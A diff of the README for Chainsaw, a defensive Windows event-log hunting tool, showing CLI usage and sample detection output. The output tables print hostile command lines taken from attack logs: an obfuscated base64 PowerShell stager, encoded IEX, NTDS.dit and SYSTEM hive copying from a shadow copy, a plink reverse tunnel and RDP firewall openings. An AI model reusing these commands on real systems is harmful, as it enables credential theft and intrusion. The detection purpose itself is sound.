+ ██║ ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║ + ██║ ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║ + ╚██████╗██║ ██║██║ ██║██║██║ ╚████║███████║██║ ██║╚███╔███╔╝ + ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ ╚══╝╚══╝ + By F-Secure Countercept (@FranticTyping, @AlexKornitzer) + + [+] Loading detection rules from: sigma_rules + [+] Loaded 169 detection rules (338 not loaded) + [+] Loading event logs from: evtx_attack_samples (extensions: .evtx) + [+] Loaded 268 EVTX files (37.5 MB) + [+] Hunting: [========================================] 268/268 + + [+] Group: Suspicious File Creation + ┌─────────────────────┬───────────────────────────────┬───────┬──────────────────────────┬──────────────────────────────────────────┬──────────────────────────────────────────┐ + │ timestamp │ detections │ count │ Computer │ Image │ Target File Name │ + ├─────────────────────┼───────────────────────────────┼───────┼──────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ + │ 2019-06-21 07:35:37 │ ‣ Dumpert Process Dumper │ 1 │ alice.insecurebank.local │ C:\Users\administrator\Desktop\x64\Outfl │ C:\Windows\Temp\dumpert.dmp │ + │ │ │ │ │ ank-Dumpert.exe │ │ + ├─────────────────────┼───────────────────────────────┼───────┼──────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ + │ 2020-08-12 13:04:27 │ ‣ CVE-2021-1675 Print Spooler │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\spoolsv.exe │ C:\Windows\System32\spool\drivers\x64\3\ │ + │ │ Exploitation Filename │ │ │ │ New\STDSCHMX.GDL │ + │ │ Pattern │ │ │ │ │ + └─────────────────────┴───────────────────────────────┴───────┴──────────────────────────┴──────────────────────────────────────────┴──────────────────────────────────────────┘ + + [+] Group: Suspicious Process Creation + ┌─────────────────────┬───────────────────────────────┬───────┬─────────────┬──────────────────────────────────────────┬──────────────────────────────────────────┬──────────────────────────────────────────┐ + │ timestamp │ detections │ count │ Computer │ Image │ Command Line │ Parent Command Line │ + ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ + │ 2019-04-30 20:26:52 │ ‣ Encoded FromBase64String │ 1 │ IEWIN7 │ C:\Windows\System32\WindowsPowerShell\v1 │ powershell.exe -nop -w hidden -noni -c " │ C:\Windows\system32\cmd.exe /b /c start │ + │ │ │ │ │ .0\powershell.exe │ if([IntPtr]::Size -eq 4){$b='powershell. │ /b /min powershell.exe -nop -w hidden -n │ + │ │ │ │ │ │ exe'}else{$b=$env:windir+'\syswow64\Wind │ oni -c "if([IntPtr]::Size -eq 4){$b='pow │ + │ │ │ │ │ │ owsPowerShell\v1.0\powershell.exe'};$s=N │ ershell.exe'}else{$b=$env:windir+'\syswo │ + │ │ │ │ │ │ ew-Object System.Diagnostics.ProcessStar │ w64\WindowsPowerShell\v1.0\powershell.ex │ + │ │ │ │ │ │ tInfo;$s.FileName=$b;$s.Arguments='-noni │ e'};$s=New-Object System.Diagnostics.Pro │ + │ │ │ │ │ │ -nop -w hidden -c &([scriptblock]::crea │ cessStartInfo;$s.FileName=$b;$s.Argument │ + │ │ │ │ │ │ IO.MemoryStream(,[Convert]::FromBase64St │ ew-Object IO.Compression.GzipStream((New │ + │ │ │ │ │ │ ring(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVE │ -Object IO.MemoryStream(,[Convert]::From │ + │ │ │ │ │ │ rZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/ │ Base64String(''H4sIAIuvyFwCA7VW+2/aSBD+O │ + │ │ │ │ │ │ u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2Dx │ ZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0la │ + │ │ │ │ │ │ Crl3Gbhx9ZapgqKf... │ yP6kiEwOpsexgQCk... │ + │ │ │ │ │ │ │ │ + │ │ │ │ │ │ (use --full to show all content) │ (use --full to show all content) │ + ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ + │ 2019-08-14 12:17:14 │ ‣ Encoded FromBase64String │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\wscript.exe │ "c:\windows\system32\wscript.exe" /E:vbs │ "C:\Windows\system32\rundll32.exe" zipfl │ + │ │ ‣ Encoded IEX │ │ │ │ c:\windows\temp\icon.ico "powershell -e │ dr.dll,RouteTheCall shell:::{769f9427-3c │ + │ │ │ │ │ │ xec bypass -c ""IEX ([System.Text.Encodi │ c6-4b62-be14-2a705115b7ab} │ + │ │ │ │ │ │ ng]::ASCII.GetString([System.Convert]::F │ │ + │ │ │ │ │ │ romBase64String('JFhYPUlFWCgoJ1snICsgW2N │ │ + │ │ │ │ │ │ dOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNic │ │ + │ │ │ │ │ │ gKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDU │ │ + │ │ │ │ │ │ zICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZ │ │ + │ │ │ │ │ │ mICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyB │ │ + │ │ │ │ │ │ 7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1 │ │ + │ │ │ │ │ │ bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHY │ │ + │ │ │ │ │ │ vMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnN │ │ + │ │ │ │ │ │ lKCRkKTtJRVgoWyc... │ │ + │ │ │ │ │ │ │ │ + │ │ │ │ │ │ (use --full to show all content) │ │ + ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ + │ 2019-11-03 13:51:58 │ ‣ Suspicious Shells Spawn │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\cmd.exe │ "C:\Windows\system32\cmd.exe" /c set > c │ "c:\Program Files\Microsoft SQL Server\M │ + │ │ by SQL Server │ │ │ │ :\users\\public\netstat.txt │ SSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.ex │ + │ │ │ │ │ │ │ e" -sSQLEXPRESS │ + ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ + │ 2020-10-20 22:33:02 │ ‣ Trickbot Malware Activity │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\wermgr.exe │ C:\Windows\system32\wermgr.exe │ rundll32.exe c:\temp\winfire.dll,DllRegi │ + │ │ │ │ │ │ │ sterServer │ + └─────────────────────┴───────────────────────────────┴───────┴─────────────┴──────────────────────────────────────────┴──────────────────────────────────────────┴──────────────────────────────────────────┘ + +## Table Of Contents + +- [Features](#features) +- [Why Chainsaw?](#why-chainsaw) +- [Quick Start Guide](#quick-start-guide) + - [Downloading and Running](#downloading-and-running) + - [EDR and AV Warnings](#edr-and-av-warnings) +- [Examples](#examples) + - [Searching](#searching) + - [Hunting](#hunting) +- [Acknowledgements](#acknowledgements) + +Extended information can be found in the Wiki for this tool: https://github.com/countercept/chainsaw/wiki + +## Why Chainsaw? + +Windows event logs provide a rich source of forensic information for threat hunting and incident response investigations. Unfortunately, processing and searching through event logs can be a slow and time-consuming process, and in most cases requires the overhead of surrounding infrastructure – such as an ELK stack or Splunk instance – to hunt efficiently through the log data and apply detection logic. This overhead often means that blue teams are unable to quickly triage Windows event logs to provide the direction and conclusions required to progress their investigations. + +At WithSecure Countercept, we ingest a wide range of telemetry sources from endpoints via our EDR agent to provide our managed detection and response service. However, there are circumstances where we need to quickly analyze event log data that hasn’t been captured by our EDR, a common example being incident response investigations on an estate where our EDR wasn’t installed at the time of the compromise. Chainsaw was created to provide our threat hunters and incident response consultants with a tool to perform rapid triage of Windows event logs in these circumstances. + +At the time of writing, there are very few open-source, standalone tools that provide a simple and fast method of triaging Windows event logs, identifying interesting elements within the logs and applying a detection logic rule format (such as Sigma) to detect signs of malicious activity. In our testing, the tools that did exist struggled to efficiently apply detection logic to large volumes of event logs making them unsuitable for scenarios where quick triage is required. ## Hunting Logic ---- ### Sigma Rule Matching -Using the `--rules` and `--mapping` parameters you can specify a directory containing a subset of SIGMA detection rules (or just the entire SIGMA git repo) and chainsaw will automatically load, convert and run these rules against the provided event logs. The mapping file tells chainsaw what event IDs to run the detection rules against, and what fields are relevant. By default the following event IDs are supported: +Using the `--sigma` and `--mapping` parameters you can specify a directory containing a subset of SIGMA detection rules (or just the entire SIGMA git repo) and chainsaw will automatically load, convert and run these rules against the provided event logs. The mapping file tells chainsaw what event IDs to run the detection rules against, and what fields are relevant. By default the following event IDs are supported: |Event Type|Event ID | |--|--| @@ -37,19 +130,19 @@ Using the `--rules` and `--mapping` parameters you can specify a directory conta |Scheduled Task Creation|4698| |Service Creation|7045| -### Built-In Logic +### Chainsaw Detection Rules +In addition to supporting sigma rules, Chainsaw also supports a custom rule format. In the repository you will find a `rules` directory that contains various Chainsaw rules that allows users to: - 1. Extraction and parsing of Windows Defender, F-Secure, Sophos, and Kaspersky AV alerts - 2. Detection of key event logs being cleared, or the event log service being stopped + 1. Extract and parse Windows Defender, F-Secure, Sophos, and Kaspersky AV alerts + 2. Detect key event logs being cleared, or the event log service being stopped 3. Users being created or added to sensitive user groups - 4. Brute-force of local user accounts - 5. RDP Logins + 4. Remote Logins (Service, RDP, Network etc.) events. This helps hunters to identify sources of lateral movement + 5. Brute-force of local user accounts -You can specify the `--lateral-all` flag to chainsaw to also parse and extract additional 4624 logon types (network logons, service, batch etc.) relating to potential lateral movement that may be interesting for investigations. -## Getting Started ---- -You can find pre-compiled versions of chainsaw in the releases section of this Github repo, or you can clone the repo (and the submodules) by running: +## Quick Start Guide +### Downloading and Running +You can find pre-compiled versions of chainsaw in the [releases section](https://github.com/countercept/chainsaw/releases) of this Github repo, or you can clone the repo (and the submodules) by running: `git clone --recurse-submodules https://github.com/countercept/chainsaw.git` You can then compile the code yourself by running: `cargo build --release`. Once the build has finished, you will find a copy of the compiled binary in the target/release folder. @@ -58,661 +151,110 @@ You can then compile the code yourself by running: `cargo build --release`. Onc If you want to quickly see what Chainsaw looks like when it runs, you can use the command: ``` -./chainsaw hunt evtx_attack_samples/ --rules sigma_rules/ --mapping mapping_files/sigma-mapping.yml +./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml ``` +### EDR and AV Warnings +When downloading and running chainsaw you may find that your local EDR / AntiVirus engine detects Chainsaw as malicious. You can see examples of this in the following Github issues: [Example1](https://github.com/countercept/chainsaw/issues/12), [Example2](https://github.com/countercept/chainsaw/issues/47). +These warnings are typically due to the example event logs and/or Sigma rules which contain references to malicious strings (e.g. "mimikatz"). We have also seen instances where the Chainsaw binary has been detected by a small subset of Anti-Virus engines likely due to some form of heuristics detection. ## Examples ---- ### Searching + USAGE: + chainsaw search [FLAGS] [OPTIONS] [--] [path]... + + FLAGS: + -h, --help Prints help information + -i, --ignore-case Ignore the case when searching patterns + --json Print the output in json format + --load-unknown Allow chainsaw to try and load files it cannot identify + --local Output the timestamp using the local machine's timestamp + -q Supress informational output + --skip-errors Continue to search when an error is encountered + -V, --version Prints version information + + OPTIONS: + --extension ... Only search through files with the provided extension + --from The timestamp to search from. Drops any documents older than the value provided + -o, --output The file to output to + -e, --regexp ... A regular expressions (RegEx) pattern to search for + -t, --tau ... Tau expressions to search with + --timestamp The field that contains the timestamp + --timezone Output the timestamp using the timezone provided + --to The timestamp to search up to. Drops any documents newer than the value provided + + ARGS: + A pattern to search for + ... The paths containing event logs to load and hunt through + #### Command Examples - *Search all .evtx files in the evtx_files dir for event id 4624* + *Search all .evtx files for the case-insensitive string "mimikatz"* - ./chainsaw search ~/Downloads/evtx_files/ -e 4624 + ./chainsaw search mimikatz -i evtx_attack_samples/ - *Search a specific evtx log for logon events containing the string "bob" (case insensitive)* + *Search all .evtx files for powershell script block events (Event ID 4014) - ./chainsaw search ~/Downloads/evtx_files/security.evtx -e 4624 -s "bob" -i + ./chainsaw search -t 'Event.System.EventID: =4104' evtx_attack_samples/ *Search a specific evtx log for logon events, with a matching regex pattern, output in JSON format* - ./chainsaw search ~/Downloads/evtx_files/security.evtx -e 4624 -r "bob[a-zA-Z]" --json + ./chainsaw search -e "DC[0-9].insecurebank.local" evtx_attack_samples --json ### Hunting + USAGE: + chainsaw hunt [FLAGS] [OPTIONS] [--] [path]... + + FLAGS: + --csv Print the output in csv format + --full Print the full values for the tabular output + -h, --help Prints help information + --json Print the output in json format + --load-unknown Allow chainsaw to try and load files it cannot identify + --local Output the timestamp using the local machine's timestamp + --log Print the output in log like format + --metadata Display additional metadata in the tablar output + -q Supress informational output + --skip-errors Continue to hunt when an error is encountered + -V, --version Prints version information + + OPTIONS: + --column-width Set the column width for the tabular output + --extension ... Only hunt through files with the provided extension + --from The timestamp to hunt from. Drops any documents older than the value provided + --kind ... Restrict loaded rules to specified kinds + --level ... Restrict loaded rules to specified levels + -m, --mapping ... A mapping file to tell Chainsaw how to use third-party rules + -o, --output The file/directory to output to + -r, --rule ... A path containing additional rules to hunt with + -s, --sigma ... A path containing Sigma rules to hunt with + --status ... Restrict loaded rules to specified statuses + --timezone Output the timestamp using the timezone provided + --to The timestamp to hunt up to. Drops any documents newer than the value provided + + ARGS: + The path to a collection of rules to use for hunting + ... The paths containing event logs to load and hunt through #### Command Examples -*Hunt through all event logs in a specific path, show additional information relating to potential lateral movement, and save results to individual CSV files* - -> % ./chainsaw hunt evtx_attack_samples --lateral-all --csv chainsaw_output + *Hunt through all evtx files using Sigma rules for detection logic* - ██████╗██╗ ██╗ █████╗ ██╗███╗ ██╗███████╗ █████╗ ██╗ ██╗ - ██╔════╝██║ ██║██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║ - ██║ ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║ - ██║ ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║ - ╚██████╗██║ ██║██║ ██║██║██║ ╚████║███████║██║ ██║╚███╔███╔╝ - ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ ╚══╝╚══╝ - By F-Secure Countercept (@FranticTyping, @AlexKornitzer) + ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml - [+] Found 268 EVTX files - [!] Continuing without detection rules, no path provided - [+] Hunting: [========================================] 268/268 + *Hunt through all evtx files using Sigma rules and Chainsaw rules for detection logic and output in CSV format to the results folder* + + ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml -r rules/ --csv --output results + + *Hunt through all evtx files using Sigma rules for detection logic, only search between specific timestamps, and output the results in JSON format* - [+] Created security_audit_log_was_cleared.csv - [+] Created windows_defender_detections.csv - [+] Created system_log_was_cleared.csv - [+] Created new_user_created.csv - [+] Created user_added_to_interesting_group.csv - [+] Created 4624_logins.csv - - [+] 51 Detections found - -*Hunt through all event logs in a specific path, apply detection logic and TAU rules from the specified path* - - -> % ./chainsaw hunt evtx_attack_samples/ --rules sigma_rules/ --mapping mapping_files/sigma-mapping.yml - - ██████╗██╗ ██╗ █████╗ ██╗███╗ ██╗███████╗ █████╗ ██╗ ██╗ - ██╔════╝██║ ██║██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║ - ██║ ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║ - ██║ ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║ - ╚██████╗██║ ██║██║ ██║██║██║ ╚████║███████║██║ ██║╚███╔███╔╝ - ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ ╚══╝╚══╝ - By F-Secure Countercept (Author: @FranticTyping) - - [+] Found 266 EVTX files - [+] Loaded 734 detection rules (74 were not loadeD) - [+] Printing results to screen - [+] Hunting: [========================================] 100% - - [+] Detection: Security audit log was cleared - ┌─────────────────────┬──────┬───────────────────────────────────┬─────────────────┐ - │ system_time │ id │ computer │ subject_user │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2019-01-20 07:00:50 │ 1102 │ "WIN-77LTAPHIQ1R.example.corp" │ "Administrator" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2019-01-20 07:29:57 │ 1102 │ "WIN-77LTAPHIQ1R.example.corp" │ "Administrator" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2019-11-15 08:19:02 │ 1102 │ "alice.insecurebank.local" │ "bob" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2020-07-22 20:29:27 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2020-09-02 11:47:39 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2020-09-15 18:04:36 │ 1102 │ "MSEDGEWIN10" │ "IEUser" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2020-09-15 19:28:17 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2020-09-17 10:57:37 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤ - │ 2020-09-23 16:49:41 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "Administrator" │ - └─────────────────────┴──────┴───────────────────────────────────┴─────────────────┘ - - [+] Detection: Suspicious Command Line - ┌─────────────────────┬──────┬──────────────────────────────┬─────────────────────┬─────────────────────────────┬───────────────────────────────────┐ - │ system_time │ id │ detection_rules │ computer_name │ Event.EventData.CommandLine │ process_name │ - ├─────────────────────┼──────┼──────────────────────────────┼─────────────────────┼─────────────────────────────┼───────────────────────────────────┤ - │ 2019-02-13 18:03:28 │ 4688 │ ‣ Exfiltration and Tunneling │ "PC01.example.corp" │ │ C:\Users\user01\Desktop\plink.exe │ - │ │ │ Tools Execution │ │ │ │ - └─────────────────────┴──────┴──────────────────────────────┴─────────────────────┴─────────────────────────────┴───────────────────────────────────┘ - - [+] Detection: Suspicious Process Creation - ┌─────────────────────┬────┬──────────────────────────────────────────┬────────────────────────────────┬────────────────────────────────────────────────────┬────────────────────────────────────────────────────┐ - │ system_time │ id │ detection_rules │ computer_name │ Event.EventData.Image │ command_line │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-02-16 10:02:21 │ 1 │ ‣ Exfiltration and Tunneling │ "PC01.example.corp" │ C:\Users\IEUser\Desktop\plink.exe │ plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127 │ - │ │ │ Tools Execution │ │ │ .0.0.2:3389 -l test -pw test │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-03-17 20:18:09 │ 1 │ ‣ Netsh Port or Application │ "PC04.example.corp" │ C:\Windows\System32\netsh.exe │ netsh advfirewall firewall add rule name="Remote D │ - │ │ │ Allowed │ │ │ esktop" dir=in protocol=tcp localport=3389 profile │ - │ │ │ ‣ Netsh RDP Port Opening │ │ │ =any action=allow │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-03-17 20:20:17 │ 1 │ ‣ File or Folder Permissions │ "PC04.example.corp" │ C:\Windows\System32\icacls.exe │ "C:\Windows\System32\icacls.exe" C:\Windows\System │ - │ │ │ Modifications │ │ │ 32\termsrv.dll /grant %%username%%:F │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-03-17 20:20:17 │ 1 │ ‣ File or Folder Permissions │ "PC04.example.corp" │ C:\Windows\System32\icacls.exe │ "C:\Windows\System32\icacls.exe" C:\Windows\System │ - │ │ │ Modifications │ │ │ 32\termsrv.dll /grant *S-1-1-0:(F) │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-04-27 18:47:00 │ 1 │ ‣ Execution from Suspicious │ "IEWIN7" │ C:\Users\Public\KeeFarce.exe │ KeeFarce.exe │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-04-29 20:59:21 │ 1 │ ‣ Non Interactive PowerShell │ "IEWIN7" │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ "C:\Windows\System32\WindowsPowerShell\v1.0\powers │ - │ │ │ │ │ ell.exe │ hell.exe" -s -NoLogo -NoProfile │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-04-29 20:59:22 │ 1 │ ‣ Local Accounts Discovery │ "IEWIN7" │ C:\Windows\System32\whoami.exe │ "C:\Windows\system32\whoami.exe" /all │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-04-30 07:46:15 │ 1 │ ‣ Meterpreter or Cobalt │ "IEWIN7" │ C:\Windows\System32\cmd.exe │ cmd.exe /c echo msdhch > \\.\pipe\msdhch │ - │ │ │ Strike Getsystem Service │ │ │ │ - │ │ │ Start │ │ │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-04-30 20:26:52 │ 1 │ ‣ Mimikatz Command Line │ "IEWIN7" │ C:\Windows\System32\cmd.exe │ C:\Windows\system32\cmd.exe /b /c start /b /min po │ - │ │ │ ‣ FromBase64String Command │ │ │ wershell.exe -nop -w hidden -noni -c "if([IntPtr]: │ - │ │ │ Line │ │ │ :Size -eq 4){$b='powershell.exe'}else{$b=$env:wind │ - │ │ │ ‣ Curl Start Combination │ │ │ ir+'\syswow64\WindowsPowerShell\v1.0\powershell.ex │ - │ │ │ │ │ │ e'};$s=New-Object System.Diagnostics.ProcessStartI │ - │ │ │ │ │ │ nfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hid │ - │ │ │ │ │ │ den -c &([scriptblock]::create((New-Object IO.Stre │ - │ │ │ │ │ │ amReader(New-Object IO.Compression.GzipStream((New │ - │ │ │ │ │ │ -Object IO.MemoryStream(,[Convert]::FromBase64Stri │ - │ │ │ │ │ │ ng(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVu │ - │ │ │ │ │ │ jVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7M │ - │ │ │ │ │ │ z33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5 │ - │ │ │ │ │ │ Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OS │ - │ │ │ │ │ │ TiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaM │ - │ │ │ │ │ │ irk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEn │ - │ │ │ │ │ │ tiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/ │ - │ │ │ │ │ │ Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrR │ - │ │ │ │ │ │ ItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/meb │ - │ │ │ │ │ │ DLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/ │ - │ │ │ │ │ │ O35y7GUVWdyP6kiEwOpsexgQCk7s8pg... │ - │ │ │ │ │ │ │ - │ │ │ │ │ │ (use --full to show all content) │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-04-30 20:26:52 │ 1 │ ‣ Mimikatz Command Line │ "IEWIN7" │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ powershell.exe -nop -w hidden -noni -c "if([IntPtr │ - │ │ │ ‣ FromBase64String Command │ │ ell.exe │ ]::Size -eq 4){$b='powershell.exe'}else{$b=$env:wi │ - │ │ │ Line │ │ │ ndir+'\syswow64\WindowsPowerShell\v1.0\powershell. │ - │ │ │ ‣ Non Interactive PowerShell │ │ │ exe'};$s=New-Object System.Diagnostics.ProcessStar │ - │ │ │ │ │ │ tInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w h │ - │ │ │ │ │ │ idden -c &([scriptblock]::create((New-Object IO.St │ - │ │ │ │ │ │ reamReader(New-Object IO.Compression.GzipStream((N │ - │ │ │ │ │ │ ew-Object IO.MemoryStream(,[Convert]::FromBase64St │ - │ │ │ │ │ │ ring(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJ │ - │ │ │ │ │ │ VujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM │ - │ │ │ │ │ │ 7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQh │ - │ │ │ │ │ │ z5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9 │ - │ │ │ │ │ │ OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdF │ - │ │ │ │ │ │ aMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkv │ - │ │ │ │ │ │ EntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJv │ - │ │ │ │ │ │ U/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEiv │ - │ │ │ │ │ │ rRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/m │ - │ │ │ │ │ │ ebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz │ - │ │ │ │ │ │ 2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE │ - │ │ │ │ │ │ 0148Sosy+wCrl3Gbhx9ZapgqKfP+0Bd... │ - │ │ │ │ │ │ │ - │ │ │ │ │ │ (use --full to show all content) │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-19 15:11:26 │ 1 │ ‣ Shadow Copies Creation │ "MSEDGEWIN10" │ C:\Windows\System32\vssadmin.exe │ vssadmin.exe create shadow /for=C: │ - │ │ │ Using Operating Systems │ │ │ │ - │ │ │ Utilities │ │ │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-19 15:11:27 │ 1 │ ‣ Copying Sensitive Files │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALR │ - │ │ │ with Credential Data │ │ │ OOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ │ - │ │ │ │ │ │ NTDS.dit C:\Extract\ntds.dit" │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-19 15:11:27 │ 1 │ ‣ Copying Sensitive Files │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALR │ - │ │ │ with Credential Data │ │ │ OOT\Device\HarddiskVolumeShadowCopy1\Windows\Syste │ - │ │ │ │ │ │ m32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-26 07:39:14 │ 1 │ ‣ HH.exe Execution │ "MSEDGEWIN10" │ C:\Windows\hh.exe │ "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Re │ - │ │ │ │ │ │ cord N104F.chm │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-26 07:39:14 │ 1 │ ‣ HTML Help Shell Spawn │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ "C:\Windows\System32\cmd.exe" /c copy /Y C:\Window │ - │ │ │ ‣ Suspicious Rundll32 Activity │ │ │ s\system32\rundll32.exe %%TEMP%%\out.exe > nul && │ - │ │ │ │ │ │ %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApp │ - │ │ │ │ │ │ lication ";document.write();h=new%%20ActiveXObject │ - │ │ │ │ │ │ 